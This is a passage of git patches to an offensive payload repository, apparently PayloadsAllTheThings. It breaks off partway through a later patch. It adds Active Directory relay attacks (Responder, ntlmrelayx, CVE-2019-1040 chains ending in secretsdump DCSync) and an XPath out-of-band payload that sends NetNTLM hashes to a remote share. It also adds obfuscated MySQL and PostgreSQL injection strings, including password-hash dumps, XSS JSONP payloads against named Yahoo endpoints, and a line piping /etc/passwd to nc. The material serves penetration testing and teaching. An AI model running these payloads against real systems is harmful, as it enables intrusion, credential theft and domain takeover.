From 11fc6e4bc5c283a3b0bf0517d7a72f63956d1e41 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 20 Oct 2019 22:09:36 +0200 Subject: [PATCH 01/15] NTLM relay + MS08-068 --- .../Active Directory Attack.md | 57 ++++++++++++++++++- 1 file changed, 55 insertions(+), 2 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 3140024..7685d9c 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -23,6 +23,8 @@ * [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key) * [Capturing and cracking NTLMv2 hashes](#capturing-and-cracking-ntlmv2-hashes) * [NTLMv2 hashes relaying](#ntlmv2-hashes-relaying) + * [MS08-068 NTLM reflection](#ms08-068-ntlm-reflection) + * [SMB Signing Disabled](#smb-signing-disabled) * [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage) * [Trust relationship between domains](#trust-relationship-between-domains) * [Unconstrained delegation](#unconstrained-delegation) @@ -658,12 +660,62 @@ hashcat -m 5600 -a 0 hash.txt crackstation.txt ### NTLMv2 hashes relaying +NTLMv1 and NTLMv2 can be relayed to connect to another machine. + +| Hash | Hashcat | Attack method | +|---|---|---| +| LM | 3000 | crack/pass the hash | +| NTLM/NTHash | 1000 | crack/pass the hash | +| NTLMv1/Net-NTLMv1 | 5500 | crack/relay attack | +| NTLMv2/Net-NTLMv2 | 5600 | crack/relay attack | + +#### MS08-068 NTLM reflection + +NTLM reflection vulnerability in the SMB protocolOnly targeting Windows 2000 to Windows Server 2008. + +> This vulnerability allows an attacker to redirect an incoming SMB connection back to the machine it came from and then access the victim machine using the victim’s own credentials. + +* https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS08-068 + +```powershell +msf > use exploit/windows/smb/smb_relay +msf exploit(smb_relay) > show targets +``` + +#### SMB Signing Disabled + If a machine has `SMB signing`:`disabled`, it is possible to use Responder with Multirelay.py script to perform an `NTLMv2 hashes relay` and get a shell access on the machine. 1. Open the Responder.conf file and set the value of `SMB` and `HTTP` to `Off`. + ```powershell + [Responder Core] + ; Servers to start + ... + SMB = Off # Turn this off + HTTP = Off # Turn this off + ``` 2. Run `python RunFinger.py -i IP_Range` to detect machine with `SMB signing`:`disabled`. 3. Run `python Responder.py -I ` and `python MultiRelay.py -t -u ALL` -4. Wait for a shell +4. Also you can use `ntlmrelayx` to dump the SAM database of the targets in the list. + ```powershell + ntlmrelayx.py -tf targets.txt + ``` +5. ntlmrelayx can also act as a SOCK proxy with every compromised sessions. + ```powershell + $ ntlmrelayx.py -tf /tmp/targets.txt -socks -smb2support + [*] Servers started, waiting for connections + Type help for list of commands + ntlmrelayx> socks + Protocol Target Username Port + -------- -------------- ------------------------ ---- + MSSQL 192.168.48.230 VULNERABLE/ADMINISTRATOR 1433 + SMB 192.168.48.230 CONTOSO/NORMALUSER1 445 + MSSQL 192.168.48.230 CONTOSO/NORMALUSER1 1433 + + $ proxychains smbclient //192.168.48.230/Users -U contoso/normaluser1 + $ proxychains mssqlclient.py contoso/normaluser1@192.168.48.230 -windows-auth + ``` + ### Dangerous Built-in Groups Usage @@ -1042,4 +1094,5 @@ PXE allows a workstation to boot from the network by retrieving an operating sys * [Kerberos (II): How to attack Kerberos? - June 4, 2019 - ELOY PÉREZ](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/) * [Attacking Read-Only Domain Controllers (RODCs) to Own Active Directory - Sean Metcalf](https://adsecurity.org/?p=3592) * [All you need to know about Keytab files - Pierre Audonnet [MSFT] - January 3, 2018](https://blogs.technet.microsoft.com/pie/2018/01/03/all-you-need-to-know-about-keytab-files/) -* [Taming the Beast Assess Kerberos-Protected Networks - Emmanuel Bouillon](https://www.blackhat.com/presentations/bh-europe-09/Bouillon/BlackHat-Europe-09-Bouillon-Taming-the-Beast-Kerberous-slides.pdf) \ No newline at end of file +* [Taming the Beast Assess Kerberos-Protected Networks - Emmanuel Bouillon](https://www.blackhat.com/presentations/bh-europe-09/Bouillon/BlackHat-Europe-09-Bouillon-Taming-the-Beast-Kerberous-slides.pdf) +* [Playing with Relayed Credentials - June 27, 2018](https://www.secureauth.com/blog/playing-relayed-credentials) \ No newline at end of file From 727eb5cabd2bf265813f0d0376912dc3c86c3acb Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Mon, 21 Oct 2019 23:00:27 +0200 Subject: [PATCH 02/15] Drop the MIC --- .../Active Directory Attack.md | 36 ++++++++++++++++++- 1 file changed, 35 insertions(+), 1 deletion(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 7685d9c..51d7003 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -25,6 +25,7 @@ * [NTLMv2 hashes relaying](#ntlmv2-hashes-relaying) * [MS08-068 NTLM reflection](#ms08-068-ntlm-reflection) * [SMB Signing Disabled](#smb-signing-disabled) + * [Drop the MIC](#drop-the-mic) * [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage) * [Trust relationship between domains](#trust-relationship-between-domains) * [Unconstrained delegation](#unconstrained-delegation) @@ -716,6 +717,37 @@ If a machine has `SMB signing`:`disabled`, it is possible to use Responder with $ proxychains mssqlclient.py contoso/normaluser1@192.168.48.230 -windows-auth ``` +#### Drop the MIC + +> The CVE-2019-1040 vulnerability makes it possible to modify the NTLM authentication packets without invalidating the authentication, and thus enabling an attacker to remove the flags which would prevent relaying from SMB to LDAP + +Check vulnerability with [cve-2019-1040-scanner](https://github.com/fox-it/cve-2019-1040-scanner) + +```powershell +python2 scanMIC.py 'DOMAIN/USERNAME:PASSWORD@TARGET' +[*] CVE-2019-1040 scanner by @_dirkjan / Fox-IT - Based on impacket by SecureAuth +[*] Target TARGET is not vulnerable to CVE-2019-1040 (authentication was rejected) +``` + +- Using any AD account, connect over SMB to a victim Exchange server, and trigger the SpoolService bug. The attacker server will connect back to you over SMB, which can be relayed with a modified version of ntlmrelayx to LDAP. Using the relayed LDAP authentication, grant DCSync privileges to the attacker account. The attacker account can now use DCSync to dump all password hashes in AD + ```powershell + TERM1> python printerbug.py testsegment.local/testuser@s2012exc.testsegment.local + TERM2> ntlmrelayx.py --remove-mic --escalate-user ntu -t ldap://s2016dc.testsegment.local -smb2support + TERM1> secretsdump.py testsegment/ntu@s2016dc.testsegment.local -just-dc + ``` + + +- Using any AD account, connect over SMB to the victim server, and trigger the SpoolService bug. The attacker server will connect back to you over SMB, which can be relayed with a modified version of ntlmrelayx to LDAP. Using the relayed LDAP authentication, grant Resource Based Constrained Delegation privileges for the victim server to a computer account under the control of the attacker. The attacker can now authenticate as any user on the victim server. + ```powershell + # create a new machine account + TERM1> ntlmrelayx.py -t ldaps://rlt-dc.relaytest.local --remove-mic --delegate-access -smb2support + TERM2> python printerbug.py relaytest.local/testuser@second-dc-server 10.0.2.6 + TERM1> getST.py -spn host/second-dc-server.local 'relaytest.local/MACHINE$:PASSWORD' -impersonate DOMAIN_ADMIN_USER_NAME + + # connect using the ticket + export KRB5CCNAME=DOMAIN_ADMIN_USER_NAME.ccache + secretsdump.py -k -no-pass second-dc-server.local -just-dc + ``` ### Dangerous Built-in Groups Usage @@ -1095,4 +1127,6 @@ PXE allows a workstation to boot from the network by retrieving an operating sys * [Attacking Read-Only Domain Controllers (RODCs) to Own Active Directory - Sean Metcalf](https://adsecurity.org/?p=3592) * [All you need to know about Keytab files - Pierre Audonnet [MSFT] - January 3, 2018](https://blogs.technet.microsoft.com/pie/2018/01/03/all-you-need-to-know-about-keytab-files/) * [Taming the Beast Assess Kerberos-Protected Networks - Emmanuel Bouillon](https://www.blackhat.com/presentations/bh-europe-09/Bouillon/BlackHat-Europe-09-Bouillon-Taming-the-Beast-Kerberous-slides.pdf) -* [Playing with Relayed Credentials - June 27, 2018](https://www.secureauth.com/blog/playing-relayed-credentials) \ No newline at end of file +* [Playing with Relayed Credentials - June 27, 2018](https://www.secureauth.com/blog/playing-relayed-credentials) +* [Exploiting CVE-2019-1040 - Combining relay vulnerabilities for RCE and Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/) +* [Drop the MIC - CVE-2019-1040 - Marina Simakov - Jun 11, 2019](https://blog.preempt.com/drop-the-mic) \ No newline at end of file From c6b5bbab2b577d3a488abd451bd23cc858ce5b73 Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Tue, 22 Oct 2019 20:26:04 +0200 Subject: [PATCH 03/15] fix TOC links --- Server Side Request Forgery/README.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index 46070c9..b9c47ac 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -8,17 +8,17 @@ * [Payloads with localhost](#payloads-with-localhost) * [Bypassing filters](#bypassing-filters) * [Bypass using HTTPS](#bypass-using-https) - * [Bypass localhost with [::]](#bypass-localhost-with----) + * [Bypass localhost with [::]](#bypass-localhost-with-) * [Bypass localhost with a domain redirection](#bypass-localhost-with-a-domain-redirection) * [Bypass localhost with CIDR](#bypass-localhost-with-cidr) * [Bypass using a decimal IP location](#bypass-using-a-decimal-ip-location) - * [Bypass using IPv6/IPv4 Address Embedding](#bypass-using-ipv6-ipv4-address-embedding) + * [Bypass using IPv6/IPv4 Address Embedding](#bypass-using-ipv6ipv4-address-embedding) * [Bypass using malformed urls](#bypass-using-malformed-urls) * [Bypass using rare address](#bypass-using-rare-address) * [Bypass using bash variables](#bypass-using-bash-variables) * [Bypass using tricks combination](#bypass-using-tricks-combination) * [Bypass using enclosed alphanumerics](#bypass-using-enclosed-alphanumerics) - * [Bypass filter_var() php function](#bypass-filter-var-php-function) + * [Bypass filter_var() php function](#bypass-filter_var-php-function) * [Bypass against a weak parser](#bypass-against-a-weak-parser) * [SSRF exploitation via URL Scheme](#ssrf-exploitation-via-url-scheme) * [file://](#file) @@ -668,4 +668,4 @@ More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-se - [PortSwigger - Web Security Academy Server-side request forgery (SSRF)](https://portswigger.net/web-security/ssrf) - [SVG SSRF Cheatsheet - Allan Wirth (@allanlw) - 12/06/2019](https://github.com/allanlw/svg-cheatsheet) - [SSRF’s up! Real World Server-Side Request Forgery (SSRF) - shorebreaksecurity - 2019](https://www.shorebreaksecurity.com/blog/ssrfs-up-real-world-server-side-request-forgery-ssrf/) -- [challenge 1: COME OUT, COME OUT, WHEREVER YOU ARE!](https://www.kieranclaessens.be/cscbe-web-2018.html) \ No newline at end of file +- [challenge 1: COME OUT, COME OUT, WHEREVER YOU ARE!](https://www.kieranclaessens.be/cscbe-web-2018.html) From 88f020381ddcefc96a3fb9125fa398b6f74ba76a Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Tue, 22 Oct 2019 23:06:35 +0200 Subject: [PATCH 04/15] Out of band XPATH --- XPATH Injection/README.md | 27 +++++++++++++++++++++------ 1 file changed, 21 insertions(+), 6 deletions(-) diff --git a/XPATH Injection/README.md b/XPATH Injection/README.md index 4b2eddc..12bb05e 100644 --- a/XPATH Injection/README.md +++ b/XPATH Injection/README.md @@ -1,6 +1,13 @@ # XPATH injection -XPath Injection is an attack technique used to exploit applications that construct XPath (XML Path Language) queries from user-supplied input to query or navigate XML documents. +> XPath Injection is an attack technique used to exploit applications that construct XPath (XML Path Language) queries from user-supplied input to query or navigate XML documents. + +## Summary + +* [Exploitation](#exploitation) +* [Blind exploitation](#blind-exploitation) +* [Out Of Band Exploitation](#out-of-band-exploitation) +* [References](#references) ## Exploitation @@ -24,16 +31,24 @@ x' or name()='username' or 'x'='y ## Blind Exploitation -```sql 1. Size of a string -and string-length(account)=SIZE_INT - + ```sql + and string-length(account)=SIZE_INT + ``` 2. Extract a character -substring(//user[userid=5]/username,2,1)=CHAR_HERE -substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE) + ```sql + substring(//user[userid=5]/username,2,1)=CHAR_HERE + substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE) + ``` + +## Out Of Band Exploitation + +```powershell +http://example.com/?title=Foundation&type=*&rent_days=* and doc('//10.10.10.10/SHARE') ``` ## References * [OWASP XPATH Injection](https://www.owasp.org/index.php/Testing_for_XPath_Injection_(OTG-INPVAL-010)) * [XPATH Blind Explorer](http://code.google.com/p/xpath-blind-explorer/) +* [Places of Interest in Stealing NetNTLM Hashes - Osanda Malith Jayathissa - March 24, 2017](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/) From 5b59da70f7dfe4b091c2b33d9d97ab74b9f0bdeb Mon Sep 17 00:00:00 2001 From: nizam0906 Date: Fri, 25 Oct 2019 18:11:11 +0530 Subject: [PATCH 05/15] Update MySQL Injection.md Added 6 MYSQL DIOS * Zen * Zen WAF * ~tr0jAn WAF * ~tr0jAn Benchmark * N1Z4M * sharik --- SQL Injection/MySQL Injection.md | 20 +++++++++++++++++++- 1 file changed, 19 insertions(+), 1 deletion(-) diff --git a/SQL Injection/MySQL Injection.md b/SQL Injection/MySQL Injection.md index 6574bb0..f61cc52 100644 --- a/SQL Injection/MySQL Injection.md +++ b/SQL Injection/MySQL Injection.md @@ -266,6 +266,24 @@ make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(51 -- M@dBl00d (Select export_set(5,@:=0,(select count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)) + +-- Zen ++make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@) + +-- Zen WAF +(/*!12345sELecT*/(@)from(/*!12345sELecT*/(@:=0x00),(/*!12345sELecT*/(@)from(`InFoRMAtiON_sCHeMa`.`ColUMNs`)where(`TAblE_sCHemA`=DatAbAsE/*data*/())and(@)in(@:=CoNCat%0a(@,0x3c62723e5461626c6520466f756e64203a20,TaBLe_nAMe,0x3a3a,column_name))))a) + +-- ~tr0jAn WAF ++concat/*!(unhex(hex(concat/*!(0x3c2f6469763e3c2f696d673e3c2f613e3c2f703e3c2f7469746c653e,0x223e,0x273e,0x3c62723e3c62723e,unhex(hex(concat/*!(0x3c63656e7465723e3c666f6e7420636f6c6f723d7265642073697a653d343e3c623e3a3a207e7472306a416e2a2044756d7020496e204f6e652053686f74205175657279203c666f6e7420636f6c6f723d626c75653e28574146204279706173736564203a2d20207620312e30293c2f666f6e743e203c2f666f6e743e3c2f63656e7465723e3c2f623e))),0x3c62723e3c62723e,0x3c666f6e7420636f6c6f723d626c75653e4d7953514c2056657273696f6e203a3a20,version(),0x7e20,@@version_comment,0x3c62723e5072696d617279204461746162617365203a3a20,@d:=database(),0x3c62723e44617461626173652055736572203a3a20,user(),(/*!12345selEcT*/(@x)/*!from*/(/*!12345selEcT*/(@x:=0x00),(@r:=0),(@running_number:=0),(@tbl:=0x00),(/*!12345selEcT*/(0) from(information_schema./**/columns)where(table_schema=database()) and(0x00)in(@x:=Concat/*!(@x, 0x3c62723e, if( (@tbl!=table_name), Concat/*!(0x3c666f6e7420636f6c6f723d707572706c652073697a653d333e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@r:=@r%2b1, 2, 0x30),0x2e203c2f666f6e743e,@tbl:=table_name,0x203c666f6e7420636f6c6f723d677265656e3e3a3a204461746162617365203a3a203c666f6e7420636f6c6f723d626c61636b3e28,database(),0x293c2f666f6e743e3c2f666f6e743e,0x3c2f666f6e743e,0x3c62723e), 0x00),0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@running_number:=@running_number%2b1,3,0x30),0x2e20,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d7265643e,column_name,0x3c2f666f6e743e))))x)))))*/+ + +-- ~tr0jAn Benchmark ++concat(0x3c666f6e7420636f6c6f723d7265643e3c62723e3c62723e7e7472306a416e2a203a3a3c666f6e7420636f6c6f723d626c75653e20,version(),0x3c62723e546f74616c204e756d626572204f6620446174616261736573203a3a20,(select count(*) from information_schema.schemata),0x3c2f666f6e743e3c2f666f6e743e,0x202d2d203a2d20,concat(@sc:=0x00,@scc:=0x00,@r:=0,benchmark(@a:=(select count(*) from information_schema.schemata),@scc:=concat(@scc,0x3c62723e3c62723e,0x3c666f6e7420636f6c6f723d7265643e,LPAD(@r:=@r%2b1,3,0x30),0x2e20,(Select concat(0x3c623e,@sc:=schema_name,0x3c2f623e) from information_schema.schemata where schema_name>@sc order by schema_name limit 1),0x202028204e756d626572204f66205461626c657320496e204461746162617365203a3a20,(select count(*) from information_Schema.tables where table_schema=@sc),0x29,0x3c2f666f6e743e,0x202e2e2e20 ,@t:=0x00,@tt:=0x00,@tr:=0,benchmark((select count(*) from information_Schema.tables where table_schema=@sc),@tt:=concat(@tt,0x3c62723e,0x3c666f6e7420636f6c6f723d677265656e3e,LPAD(@tr:=@tr%2b1,3,0x30),0x2e20,(select concat(0x3c623e,@t:=table_name,0x3c2f623e) from information_Schema.tables where table_schema=@sc and table_name>@t order by table_name limit 1),0x203a20284e756d626572204f6620436f6c756d6e7320496e207461626c65203a3a20,(select count(*) from information_Schema.columns where table_name=@t),0x29,0x3c2f666f6e743e,0x202d2d3a20,@c:=0x00,@cc:=0x00,@cr:=0,benchmark((Select count(*) from information_schema.columns where table_schema=@sc and table_name=@t),@cc:=concat(@cc,0x3c62723e,0x3c666f6e7420636f6c6f723d707572706c653e,LPAD(@cr:=@cr%2b1,3,0x30),0x2e20,(Select (@c:=column_name) from information_schema.columns where table_schema=@sc and table_name=@t and column_name>@c order by column_name LIMIT 1),0x3c2f666f6e743e)),@cc,0x3c62723e)),@tt)),@scc),0x3c62723e3c62723e,0x3c62723e3c62723e)+ + +-- N1Z4M WAF ++/*!13337concat*/(0x3c616464726573733e3c63656e7465723e3c62723e3c68313e3c666f6e7420636f6c6f723d22526564223e496e6a6563746564206279204e315a344d3c2f666f6e743e3c68313e3c2f63656e7465723e3c62723e3c666f6e7420636f6c6f723d2223663364393361223e4461746162617365207e3e3e203c2f666f6e743e,database/**N1Z4M**/(),0x3c62723e3c666f6e7420636f6c6f723d2223306639643936223e56657273696f6e207e3e3e203c2f666f6e743e,@@version,0x3c62723e3c666f6e7420636f6c6f723d2223306637363964223e55736572207e3e3e203c2f666f6e743e,user/**N1Z4M**/(),0x3c62723e3c666f6e7420636f6c6f723d2223306639643365223e506f7274207e3e3e203c2f666f6e743e,@@port,0x3c62723e3c666f6e7420636f6c6f723d2223346435613733223e4f53207e3e3e203c2f666f6e743e,@@version_compile_os,0x2c3c62723e3c666f6e7420636f6c6f723d2223366134343732223e44617461204469726563746f7279204c6f636174696f6e207e3e3e203c2f666f6e743e,@@datadir,0x3c62723e3c666f6e7420636f6c6f723d2223333130343362223e55554944207e3e3e203c2f666f6e743e,UUID/**N1Z4M**/(),0x3c62723e3c666f6e7420636f6c6f723d2223363930343637223e43757272656e742055736572207e3e3e203c2f666f6e743e,current_user/**N1Z4M**/(),0x3c62723e3c666f6e7420636f6c6f723d2223383432303831223e54656d70204469726563746f7279207e3e3e203c2f666f6e743e,@@tmpdir,0x3c62723e3c666f6e7420636f6c6f723d2223396336623934223e424954532044455441494c53207e3e3e203c2f666f6e743e,@@version_compile_machine,0x3c62723e3c666f6e7420636f6c6f723d2223396630613838223e46494c452053595354454d207e3e3e203c2f666f6e743e,@@CHARACTER_SET_FILESYSTEM,0x3c62723e3c666f6e7420636f6c6f723d2223393234323564223e486f7374204e616d65207e3e3e203c2f666f6e743e,@@hostname,0x3c62723e3c666f6e7420636f6c6f723d2223393430313333223e53797374656d2055554944204b6579207e3e3e203c2f666f6e743e,UUID/**N1Z4M**/(),0x3c62723e3c666f6e7420636f6c6f723d2223613332363531223e53796d4c696e6b20207e3e3e203c2f666f6e743e,@@GLOBAL.have_symlink,0x3c62723e3c666f6e7420636f6c6f723d2223353830633139223e53534c207e3e3e203c2f666f6e743e,@@GLOBAL.have_ssl,0x3c62723e3c666f6e7420636f6c6f723d2223393931663333223e42617365204469726563746f7279207e3e3e203c2f666f6e743e,@@basedir,0x3c62723e3c2f616464726573733e3c62723e3c666f6e7420636f6c6f723d22626c7565223e,(/*!13337select*/(@a)/*!13337from*/(/*!13337select*/(@a:=0x00),(/*!13337select*/(@a)/*!13337from*/(information_schema.columns)/*!13337where*/(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(@a)in(@a:=/*!13337concat*/(@a,table_schema,0x3c666f6e7420636f6c6f723d22726564223e20203a3a203c2f666f6e743e,table_name,0x3c666f6e7420636f6c6f723d22726564223e20203a3a203c2f666f6e743e,column_name,0x3c62723e))))a))+ + +-- sharik +(select(@a)from(select(@a:=0x00),(select(@a)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(@a)in(@a:=concat(@a,table_name,0x203a3a20,column_name,0x3c62723e))))a) ``` ## MYSQL Current queries @@ -377,4 +395,4 @@ load data infile '\\\\error\\abc' into table database.table_name; - [HackerOne @ajxchapman 50m-ctf writeup - Alex Chapman @ajxchapman](https://hackerone.com/reports/508123) - [SQL Wiki - netspi](https://sqlwiki.netspi.com/injectionTypes/errorBased) - [ekoparty web_100 - 2016/10/26 - p4-team](https://github.com/p4-team/ctf/tree/master/2016-10-26-ekoparty/web_100) -- [Websec - MySQL - Roberto Salgado - May 29, 2013.](https://websec.ca/kb/sql_injection#MySQL_Default_Databases) \ No newline at end of file +- [Websec - MySQL - Roberto Salgado - May 29, 2013.](https://websec.ca/kb/sql_injection#MySQL_Default_Databases) From aef5bb864ae2050c7b8e071b3a39742a4918a1c9 Mon Sep 17 00:00:00 2001 From: nizam0906 Date: Fri, 25 Oct 2019 22:27:16 +0530 Subject: [PATCH 06/15] Update jsonp_endpoint.txt Added 3 yahoo jsonp endpoints * https://ads.yap.yahoo.com/nosdk/wj/v1/getAds.do?cb=alert(1337) * https://mempf.yahoo.co.jp/offer?position=h&callback=alert(1337) * https://suggest-shop.yahooapis.jp/Shopping/Suggest/V1/suggester?callback=alert(1)//&appid=dj0zaiZpPVkwMDJ1RHlqOEdwdCZzPWNvbnN1bWVyc2VjcmV0Jng9M2Y- --- XSS Injection/Intruders/jsonp_endpoint.txt | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/XSS Injection/Intruders/jsonp_endpoint.txt b/XSS Injection/Intruders/jsonp_endpoint.txt index e514d81..12add24 100644 --- a/XSS Injection/Intruders/jsonp_endpoint.txt +++ b/XSS Injection/Intruders/jsonp_endpoint.txt @@ -24,6 +24,9 @@ #Uber.com: "> #AOL/Yahoo +"> +"> +"> "> "> "> @@ -51,4 +54,4 @@ #GoogleAPI's "> "> -ng-app"ng-csp ng-click=$event.view.alert(1337)> \ No newline at end of file +ng-app"ng-csp ng-click=$event.view.alert(1337)> From f35ace93cf0655bbec0a753103899650e7a8b489 Mon Sep 17 00:00:00 2001 From: nizam0906 Date: Sat, 26 Oct 2019 18:07:14 +0530 Subject: [PATCH 07/15] Update PostgreSQL Injection.md Updated PostgreSQL Error Based injections --- SQL Injection/PostgreSQL Injection.md | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/SQL Injection/PostgreSQL Injection.md b/SQL Injection/PostgreSQL Injection.md index c75ee73..b8d962d 100644 --- a/SQL Injection/PostgreSQL Injection.md +++ b/SQL Injection/PostgreSQL Injection.md @@ -25,8 +25,13 @@ ```sql ,cAsT(chr(126)||vErSiOn()||chr(126)+aS+nUmeRiC) ,cAsT(chr(126)||(sEleCt+table_name+fRoM+information_schema.tables+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)-- -,cAsT(chr(126)||(sEleCt+column_name+fRoM+information_schema.columns+wHerE+table_name=data_column+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)-- +,cAsT(chr(126)||(sEleCt+column_name+fRoM+information_schema.columns+wHerE+table_name='data_table'+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)-- ,cAsT(chr(126)||(sEleCt+data_column+fRoM+data_table+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC) + +' and 1=cast((SELECT concat('DATABASE: ',current_database())) as int) and '1'='1 +' and 1=cast((SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET data_offset) as int) and '1'='1 +' and 1=cast((SELECT column_name FROM information_schema.columns WHERE table_name='data_table' LIMIT 1 OFFSET data_offset) as int) and '1'='1 +' and 1=cast((SELECT data_column FROM data_table LIMIT 1 OFFSET data_offset) as int) and '1'='1 ``` ## PostgreSQL Blind @@ -95,4 +100,4 @@ SELECT system('cat /etc/passwd | nc '); * [A Penetration Tester’s Guide to PostgreSQL - David Hayter](https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9) * [Authenticated Arbitrary Command Execution on PostgreSQL 9.3 > Latest - Mar 20 2019 - GreenWolf](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5) * [SQL Injection /webApp/oma_conf ctx parameter (viestinta.lahitapiola.fi) - December 8, 2016 - Sergey Bobrov (bobrov)](https://hackerone.com/reports/181803) -* [POSTGRESQL 9.X REMOTE COMMAND EXECUTION - 26 Oct 17 - Daniel](https://www.dionach.com/blog/postgresql-9x-remote-command-execution) \ No newline at end of file +* [POSTGRESQL 9.X REMOTE COMMAND EXECUTION - 26 Oct 17 - Daniel](https://www.dionach.com/blog/postgresql-9x-remote-command-execution) From 525429c0d88d0ca968c02880868029e26f5175dc Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Sat, 26 Oct 2019 16:43:36 +0200 Subject: [PATCH 08/15] XPATH: add tools --- XPATH Injection/README.md | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/XPATH Injection/README.md b/XPATH Injection/README.md index 12bb05e..bcbe72e 100644 --- a/XPATH Injection/README.md +++ b/XPATH Injection/README.md @@ -7,6 +7,7 @@ * [Exploitation](#exploitation) * [Blind exploitation](#blind-exploitation) * [Out Of Band Exploitation](#out-of-band-exploitation) +* [Tools](#tools) * [References](#references) ## Exploitation @@ -47,8 +48,15 @@ x' or name()='username' or 'x'='y http://example.com/?title=Foundation&type=*&rent_days=* and doc('//10.10.10.10/SHARE') ``` +## Tools + +- [xcat](https://github.com/orf/xcat) - Automate XPath injection attacks to retrieve documents +- [xxxpwn](https://github.com/feakk/xxxpwn) - Advanced XPath Injection Tool +- [xxxpwn_smart](https://github.com/aayla-secura/xxxpwn_smart) - A fork of xxxpwn using predictive text +- [xpath-blind-explorer](https://github.com/micsoftvn/xpath-blind-explorer) +- [XmlChor](https://github.com/Harshal35/XMLCHOR) - Xpath injection exploitation tool + ## References * [OWASP XPATH Injection](https://www.owasp.org/index.php/Testing_for_XPath_Injection_(OTG-INPVAL-010)) -* [XPATH Blind Explorer](http://code.google.com/p/xpath-blind-explorer/) * [Places of Interest in Stealing NetNTLM Hashes - Osanda Malith Jayathissa - March 24, 2017](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/) From 3dcd4425a87012f147fd1b995b7ed81debf7bb26 Mon Sep 17 00:00:00 2001 From: nizam0906 Date: Mon, 28 Oct 2019 16:26:49 +0530 Subject: [PATCH 09/15] Added more PostgreSQL Injection Queries * PostgreSQL version * PostgreSQL Current User * PostgreSQL List Users * PostgreSQL List Password Hashes * PostgreSQL List Privileges * PostgreSQL database name * PostgreSQL List databases * PostgreSQL List tables * PostgreSQL List columns * PostgreSQL Stacked query --- SQL Injection/PostgreSQL Injection.md | 76 +++++++++++++++++++++++++++ 1 file changed, 76 insertions(+) diff --git a/SQL Injection/PostgreSQL Injection.md b/SQL Injection/PostgreSQL Injection.md index b8d962d..d923c5a 100644 --- a/SQL Injection/PostgreSQL Injection.md +++ b/SQL Injection/PostgreSQL Injection.md @@ -3,9 +3,19 @@ ## Summary * [PostgreSQL Comments](#postgresql-comments) +* [PostgreSQL version](#postgresql-version) +* [PostgreSQL Current User](#postgresql-current-user) +* [PostgreSQL List Users](#postgresql-list-users) +* [PostgreSQL List Password Hashes](#postgresql-list-password-hashes) +* [PostgreSQL List Privileges](#postgresql-list-privileges) +* [PostgreSQL database name](#postgresql-database-name) +* [PostgreSQL List databases](#postgresql-list-database) +* [PostgreSQL List tables](#postgresql-list-tables) +* [PostgreSQL List columns](#postgresql-list-columns) * [PostgreSQL Error Based](#postgresql-error-based) * [PostgreSQL Blind](#postgresql-blind) * [PostgreSQL Time Based](#postgresql-time-based) +* [PostgreSQL Stacked query](#postgresql-stacked-query) * [PostgreSQL File Read](#postgresql-file-read) * [PostgreSQL File Write](#postgresql-file-write) * [PostgreSQL Command execution](#postgresql-command-execution) @@ -20,6 +30,64 @@ /**/ ``` +## PostgreSQL Version + +```sql +SELECT version() +``` + +## PostgreSQL Current User + +```sql +SELECT user; +SELECT current_user; +SELECT session_user; +SELECT usename FROM pg_user; +SELECT getpgusername(); +``` + +## PostgreSQL List Users + +```sql +SELECT usename FROM pg_user +``` + +## PostgreSQL List Password Hashes + +```sql +SELECT usename, passwd FROM pg_shadow +``` + +## PostgreSQL List Privileges + +```sql +SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user +``` + +## PostgreSQL Database Name + +```sql +SELECT current_database() +``` + +## 